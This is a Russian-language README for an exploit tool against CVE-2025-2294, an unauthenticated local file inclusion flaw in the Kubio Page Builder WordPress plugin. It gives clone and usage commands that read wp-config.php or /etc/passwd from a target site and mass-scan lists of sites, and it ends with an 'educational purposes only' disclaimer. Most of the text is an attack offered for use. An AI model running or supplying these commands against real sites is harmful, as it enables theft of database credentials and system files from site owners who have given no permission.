
Неаутентифицированный эксплойт Local File Inclusion (LFI) для плагина Kubio Page Builder WordPress (CVE-2025-2294). Поддерживает одиночную цель, массовое сканирование, определение версии и чтение пользовательских путей к файлам.
Эксплойт для Local File Inclusion (LFI) в плагине WordPress Kubio Page Builder (версии ≤ 2.5.1).
Этот инструмент эксплуатирует неаутентифицированную уязвимость LFI в плагине Kubio Page Builder (CVE-2025-2294), позволяя злоумышленникам читать конфиденциальные файлы на уязвимых установках WordPress.
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
| Параметр | Описание |
|---|---|
-u, --url | URL одиночной цели |
-l, --list | Файл со списком целей |
-f, --file | Файл для чтения (по умолчанию: /etc/passwd) |
-o, --output | Сохранить уязвимые цели в файл |
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
Этот инструмент предназначен только для образовательных целей. Разработчик не несет ответственности за любое неправомерное использование. Всегда получайте соответствующее разрешение перед тестированием любых систем.